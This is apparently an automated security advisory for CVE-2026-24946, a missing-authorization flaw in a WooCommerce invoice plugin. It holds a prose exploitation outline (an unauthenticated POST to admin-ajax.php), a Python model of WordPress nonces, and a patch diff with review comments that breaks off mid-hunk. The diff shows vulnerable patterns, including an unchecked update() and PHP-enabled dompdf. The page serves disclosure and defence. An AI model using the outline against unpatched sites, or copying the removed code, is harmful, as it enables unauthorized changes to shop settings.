Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24946: Print Invoice & Delivery Notes for WooCommerce <= 5.8.0 – Missing Authorization (woocommerce-delivery-notes)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 5.8.0
Patched Version: 5.9.0
Disclosed: February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24946:
The Print Invoice & Delivery Notes for WooCommerce plugin contains a missing authorization vulnerability in versions up to 5.8.0. This vulnerability allows unauthenticated attackers to trigger the plugin’s update function, which modifies WordPress site settings without proper permission checks. The CVSS score of 5.3 reflects the moderate impact of unauthorized configuration changes.

The root cause lies in the `update()` method within `/includes/class-woocommerce-delivery-notes.php`. Before patching, this method executed critical update operations without verifying user permissions or validating nonce tokens. The function at line 363 performed database operations to set default template types for invoices, receipts, and delivery notes. Atomic Edge research identified that this method lacked any capability checks or nonce verification, making it accessible to any user who could trigger the WordPress admin-ajax.php endpoint.

Exploitation requires sending a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to trigger the plugin’s update functionality. Attackers can craft a simple HTTP request that bypasses authentication entirely. The request must include the specific action name that the plugin registers for its AJAX handlers. Successful exploitation triggers the update function, which modifies plugin settings in the WordPress database.

The patch adds multiple security layers to the `update()` method. First, it checks `is_admin()` to ensure the request originates from the admin area. Second, it verifies the user has `manage_options` capability, restricting access to administrators only. Third, it validates the presence of the `wcdn_general_settings_nonce` parameter in the POST data. Finally, it uses `wp_verify_nonce()` to confirm the nonce token matches the expected `wcdn_general_settings_action`. The patch also adds nonce fields to two admin view files (`wcdn-document.php` and `wcdn-general.php`) to ensure legitimate requests include the required token.
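The nonce check the patch adds is only half of the authorization story, and the reason is easiest to see in code. The following Python model of WordPress's nonce scheme is an added example (not code from this page or from the plugin): it reimplements `wp_create_nonce()` and `wp_verify_nonce()` as defined in wp-includes/pluggable.php, with a constructed salt, session token and clock, and exercises the two `wcdn_*` actions that the patched view files emit nonces for.

```python
import hashlib
import hmac
import math

# Constructed secret standing in for wp_salt('nonce'); a real site derives it
# from NONCE_KEY/NONCE_SALT in wp-config.php.
NONCE_SALT = b"constructed-nonce-salt-for-this-example"
DAY_IN_SECONDS = 86400          # WordPress default nonce_life


def wp_hash(data: str) -> str:
    """wp_hash( $data, 'nonce' ) is hash_hmac( 'md5', $data, wp_salt( 'nonce' ) )."""
    return hmac.new(NONCE_SALT, data.encode(), hashlib.md5).hexdigest()


def nonce_tick(now: int, nonce_life: int = DAY_IN_SECONDS) -> int:
    """wp_nonce_tick(): ceil( time() / ( nonce_life / 2 ) ). A nonce is accepted
    for the tick it was minted in and the one before, i.e. 12 to 24 hours."""
    return math.ceil(now / (nonce_life / 2))


def create_nonce(action: str, uid: int, token: str, now: int) -> str:
    """wp_create_nonce(): substr( wp_hash( tick|action|uid|session_token ), -12, 10 )."""
    tick = nonce_tick(now)
    return wp_hash(f"{tick}|{action}|{uid}|{token}")[-12:-2]


def verify_nonce(nonce: str, action: str, uid: int, token: str, now: int):
    """wp_verify_nonce(): 1 for a nonce from the current tick, 2 for one from the
    previous tick, False otherwise. It binds the token to an action, a user and
    a session; it does not check whether that user may perform the action,
    which is why the patch pairs it with current_user_can( 'manage_options' )."""
    if not nonce:
        return False
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = wp_hash(f"{t}|{action}|{uid}|{token}")[-12:-2]
        if hmac.compare_digest(expected, nonce):
            return age
    return False


def demo() -> dict:
    """Exercise the two actions the patched view files emit nonces for."""
    settings = "wcdn_general_settings_action"
    logo = "wcdn_remove_shoplogo_action"
    admin_uid, admin_token = 1, "constructed-session-token"
    t0 = 1_700_000_000                      # constructed "now" (epoch seconds)

    settings_nonce = create_nonce(settings, admin_uid, admin_token, t0)
    logo_nonce = create_nonce(logo, admin_uid, admin_token, t0)
    # Logged-out visitors share uid 0 and an empty session token.
    anon_nonce = create_nonce(settings, 0, "", t0)

    return {
        # The right nonce, same tick: accepted.
        "fresh": verify_nonce(settings_nonce, settings, admin_uid, admin_token, t0),
        # wcdn-general.php emits both nonces in one form; the logo nonce does
        # not unlock the settings action.
        "wrong_action": verify_nonce(logo_nonce, settings, admin_uid, admin_token, t0),
        # A nonce minted for another user/session is rejected.
        "wrong_user": verify_nonce(settings_nonce, settings, 2, "other-token", t0),
        # 13 hours later the tick has advanced once: still accepted (as 2).
        "previous_tick": verify_nonce(settings_nonce, settings, admin_uid, admin_token, t0 + 13 * 3600),
        # 25 hours later: expired.
        "expired": verify_nonce(settings_nonce, settings, admin_uid, admin_token, t0 + 25 * 3600),
        # Every logged-out visitor verifies the same logged-out nonce: a nonce
        # proves intent from a page the site served, not authorization.
        "anonymous_shared": verify_nonce(anon_nonce, settings, 0, "", t0),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:>16}: {result}")
```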

Successful exploitation allows attackers to modify plugin configuration settings without authentication. While this vulnerability does not provide direct code execution or data exfiltration, it enables unauthorized changes to business document templates and settings. Attackers could disrupt business operations by altering invoice formats, company information display, or document generation behavior. The vulnerability represents a classic missing authorization flaw where privileged functions lack proper access controls.

Differential between vulnerable and patched code

Code Diff
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
@@ -7,6 +7,7 @@

 if ( isset( $_GET['wdcn_setting'] ) ) {
 	$setting = htmlspecialchars( $_GET['wdcn_setting'] ); // phpcs:ignore
+	wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' );
 	?>
 	<select class="card-body" name="document_type" id="document_type" onchange="location = 'admin.php?page=wc-settings&tab=wcdn-settings&setting=wcdn_document&wdcn_setting=' + this.value;" >
 		<option value="wcdn_invoice"  >Invoice</option>
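Review bot: the new `wp_nonce_field()` call sits inside the `if ( isset( $_GET['wdcn_setting'] ) )` branch, so a submission of this view that arrives without `wdcn_setting` in the query string carries no `wcdn_general_settings_nonce`, and `update()` will then return silently instead of saving; either confirm every submit path through this form sets that parameter or move the nonce field out of the conditional. While here, `$setting = htmlspecialchars( $_GET['wdcn_setting'] ); // phpcs:ignore` still takes the raw query value; since the only legitimate values are the document types offered by the `<select>` below, validating `$setting` against that list with `in_array()` is stronger than `htmlspecialchars()` and would let the `phpcs:ignore` go.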
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
@@ -20,6 +20,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'A shop logo representing your business. When the image is printed, its pixel density will automatically be eight times higher than the original. This means, 1 printed inch will correspond to about 288 pixels on the screen.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<?php wp_nonce_field( 'wcdn_remove_shoplogo_action', 'wcdn_remove_shoplogo_nonce' ); ?>
+		<?php wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' ); ?>
 		<input type="hidden" name="shop_logoid" value="
 		<?php
 		if ( isset( $shop_logoid ) && ! empty( $shop_logoid ) ) {
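Review bot: this form now emits two nonces bound to different actions (`wcdn_remove_shoplogo_nonce` and `wcdn_general_settings_nonce`); that is fine for `wp_verify_nonce()`, but make sure the logo-removal handler and the general-settings handler each verify only their own nonce, so a request that was meant to remove a logo cannot also be processed as a settings save.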
--- a/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
@@ -378,7 +378,7 @@
 						if ( '' !== $print_url ) {
 							?>
 							<div id="woocommerce-delivery-notes-bulk-print-message" class="updated">
-								<p><?php wp_kses_post( $message, 'woocommerce-delivery-notes' ); ?>
+								<p><?php echo wp_kses_post( $message, 'woocommerce-delivery-notes' ); ?>
 								<a href="<?php echo $print_url; // phpcs:ignore ?>" target="_blank" class="print-preview-button" id="woocommerce-delivery-notes-bulk-print-button"><?php esc_attr_e( 'Print now', 'woocommerce-delivery-notes' ); ?></a> <span class="print-preview-loading spinner"></span></p>
 							</div>
 							<?php
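Review bot: adding `echo` fixes a real bug (`wp_kses_post()` returns the sanitized string, so before this change nothing was printed), but the second argument `'woocommerce-delivery-notes'` is not a parameter of `wp_kses_post()`; it looks like a text domain copied from a translation call and is silently ignored, so drop it. On the next line, `<a href="<?php echo $print_url; // phpcs:ignore ?>"` still prints the URL unescaped; `esc_url( $print_url )` is the right escaper for an `href` and would make the `phpcs:ignore` unnecessary.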
--- a/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
@@ -36,7 +36,7 @@
 		 *
 		 * @var string $plugin_version Current plugin version number
 		 */
-		public static $plugin_version = '5.8.0';
+		public static $plugin_version = '5.9.0';

 		/**
 		 * Plugin URL on current installation
@@ -363,6 +363,20 @@
 		 * Install or update the default settings.
 		 */
 		public function update() {
+			// Admin Permission check.
+			if ( ! is_admin() ) {
+				return;
+			}
+			if ( ! current_user_can( 'manage_options' ) ) {
+				return;
+			}
+			if ( ! isset( $_POST['wcdn_general_settings_nonce'] ) ) {
+				return;
+			}
+			$nonce = sanitize_text_field( wp_unslash( $_POST['wcdn_general_settings_nonce'] ) );
+			if ( ! wp_verify_nonce( $nonce, 'wcdn_general_settings_action' ) ) {
+				return;
+			}
 			// Set default template type for invoice, receipt, and delivery-note if not set.
 			if ( false === get_option( 'wcdn_template_type_invoice', false ) ) {
 				add_option( 'wcdn_template_type_invoice', 'yes' );
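Review bot: the docblock says this method installs the default settings, yet after this change every caller needs a valid `wcdn_general_settings_nonce` in `$_POST`; if `update()` is also invoked on activation, upgrade or an init-style hook (not visible in this hunk), the `add_option()` calls that follow will never run on a fresh install because those paths carry no POST data. Consider splitting the default-option installation from the form handler and applying the nonce check only to the latter. Two smaller points: `is_admin()` is true for any admin-area request, `admin-ajax.php` included, and says nothing about who the user is, so `current_user_can( 'manage_options' )` is the check doing the authorization work; and the four bare `return;` statements fail silently, whereas `check_admin_referer( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' )` would replace the last three checks and surface a visible error on a bad or missing nonce.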
--- a/woocommerce-delivery-notes/includes/front/wcdn-front-function.php
+++ b/woocommerce-delivery-notes/includes/front/wcdn-front-function.php
@@ -34,7 +34,7 @@
 	// Instantiate and use the dompdf class.
 	$options = new DompdfOptions();
 	$options->set( 'isRemoteEnabled', true );
-	$options->set( 'isPhpEnabled', true );
+	$options->set( 'isPhpEnabled', false );
 	$dompdf = new Dompdf( $options );

 	// Load content from html file.
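Review bot: turning `isPhpEnabled` off is the right call: with it on, dompdf executes PHP embedded in the HTML it renders, so every value reaching a PDF template had to be fully trusted, and disabling it removes that risk independently of template escaping. `isRemoteEnabled` remains `true`, which lets dompdf fetch remote images and stylesheets referenced from the document; if the shop logo and fonts are served locally, consider disabling it too, since it allows the server to make outbound requests to whatever URLs appear in the rendered document.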
--- a/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
@@ -36,7 +36,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
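Review bot: `esc_attr( $style )` prevents the value from closing the `style` attribute but does not validate the CSS inside it, and `$style` is still built on the line above by concatenating the raw `document_setting_font_size`, `document_setting_text_align` and `document_setting_text_colour` settings. The `complimentary_close` hunk further down in this file shows the better pattern (`sanitize_hex_color()` for colours, `absint()` for sizes); apply it to every `$style` and `$labelstyle` construction in this template, including the `company-name`, `company-address`, `billing-address`, `shipping-address`, `order-notes` and `colophon-imprint` hunks, and whitelist `text_align` against `left`, `center` and `right`. Style nits: `esc_attr( $style)` is missing the space before `)` that WPCS expects, and `// phpcs:ignore` no longer suppresses anything once the output is escaped.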
@@ -50,14 +50,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -74,7 +74,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -113,7 +113,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -167,8 +167,8 @@
 								}
 								?>
 								<li>
-									<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-									<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+									<strong style="<?php echo esc_attr( $labelstyle); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+									<strong style="<?php echo esc_attr( $labelstyle); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 								</li>
 							<?php } ?>
 						<?php } ?>
@@ -284,7 +284,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -297,28 +297,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
 					</style>
 					<div class="colophon-policies">
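Review bot: the fallback is applied before sanitizing rather than after. `! empty( $x ) ? sanitize_hex_color( $x ) : '#000000'` returns null for any non-hex value (`sanitize_hex_color()` only returns the input when it matches 3 or 6 hex digits), so an invalid stored colour renders `color: ;` instead of the intended `#000000`; likewise `absint()` yields 0 for a non-numeric string such as `large`, producing `font-size: 0px`. Sanitize first and fall back on the result, e.g. `$color = sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] ) ?: '#000000';`. Also, `esc_attr()` is the attribute escaper; inside a `<style>` element it is the `sanitize_hex_color()`/`absint()` constraints that make the output safe, so the `esc_attr()` calls are harmless but misleading about which context is being escaped.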
@@ -334,7 +348,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
@@ -36,7 +36,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
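Review bot: the `$style` string assigned on the line above still concatenates the unvalidated `font_size`, `text_align` and `text_colour` settings, and `esc_attr()` only stops the value from breaking out of the attribute. This file adopts `sanitize_hex_color()` and `absint()` for the `complimentary_close` and `policies` blocks later on; the same validation belongs on every `$style` and `$labelstyle` built in this template, with `text_align` checked against a fixed list of keywords. With the output escaped, the `// phpcs:ignore` markers can also be removed.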
@@ -50,14 +50,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -74,7 +74,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -113,7 +113,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -165,8 +165,8 @@
 							}
 							?>
 							<li>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 							</li>
 						<?php } ?>
 					<?php endforeach; ?>
@@ -266,7 +266,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -279,28 +279,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
 					</style>
 					<div class="colophon-policies">
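Review bot: the `! empty()` test runs on the raw setting and the sanitizer on the other branch, so the default never applies to an invalid value: `sanitize_hex_color()` returns null for anything that is not 3 or 6 hex digits and `absint()` returns 0 for a non-numeric string, giving `color: ;` or `font-size: 0px` where `#000000` and `14` (or `12` for the policies block) were intended. Sanitize first, then fall back on the sanitized result with `?:`.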
@@ -316,7 +330,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
@@ -38,7 +38,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
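Review bot: as in the other two templates, `esc_attr( $style)` (note the missing space before `)`) escapes for the attribute context but leaves the concatenated `font_size`, `text_align` and `text_colour` settings unvalidated on the line above; the `sanitize_hex_color()`/`absint()` treatment this file gives the `complimentary_close` and `policies` blocks should cover every `$style` and `$labelstyle` assignment in the template, with `text_align` restricted to `left`, `center` or `right`.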
@@ -52,14 +52,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -76,7 +76,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -115,7 +115,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -180,8 +180,8 @@
 							}
 							?>
 							<li>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 							</li>
 						<?php } ?>
 					<?php endforeach; ?>
@@ -281,7 +281,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -294,28 +294,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
